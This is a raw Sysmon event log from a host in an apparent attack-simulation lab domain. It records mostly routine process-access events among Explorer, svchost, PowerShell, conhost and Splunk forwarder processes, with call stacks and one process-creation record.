12:06:04.126{266CAFBE-64C5-6064-A500-00000000AE01}43564392C:\Windows\Explorer.EXE{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+9dc4|C:\Windows\Explorer.EXE+1e118|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009898Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.126{266CAFBE-64C5-6064-A500-00000000AE01}43564392C:\Windows\Explorer.EXE{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+9dc4|C:\Windows\Explorer.EXE+1e118|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009897Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:04.126{266CAFBE-64C5-6064-A500-00000000AE01}43564392C:\Windows\Explorer.EXE{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009896Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.126{266CAFBE-64C5-6064-A500-00000000AE01}43564392C:\Windows\Explorer.EXE{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009895Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:04.126{266CAFBE-64C5-6064-A500-00000000AE01}43564392C:\Windows\Explorer.EXE{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009894Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.126{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009893Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.126{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000009892Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.110{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009891Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.110{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009890Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.050{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-65AB-6064-4F01-00000000AE01}6796C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009889Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:04.050{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009888Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.050{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009887Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:04.050{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009886Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.050{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009885Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.050{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-65AB-6064-4F01-00000000AE01}6796C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009884Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.050{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-65AB-6064-4F01-00000000AE01}6796C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009883Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:03.908{266CAFBE-65AB-6064-4F01-00000000AE01}6796C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009882Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.050{266CAFBE-64C5-6064-A500-00000000AE01}43566732C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009881Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.050{266CAFBE-64C5-6064-A500-00000000AE01}43566732C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000009880Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.017{266CAFBE-646C-6064-1000-00000000AE01}11242252C:\Windows\system32\svchost.exe{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009879Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.017{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009878Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.017{266CAFBE-65AC-6064-5101-00000000AE01}55606832C:\Windows\system32\conhost.exe{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009877Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:04.017{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000009876Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:04.017{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000009875Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.001{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-65AC-6064-5101-00000000AE01}5560C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009874Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:04.001{266CAFBE-64C5-6064-A500-00000000AE01}43563744C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009873Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.001{266CAFBE-64C5-6064-A500-00000000AE01}43563744C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009872Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:04.001{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009871Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:04.001{266CAFBE-64C5-6064-A500-00000000AE01}43566732C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
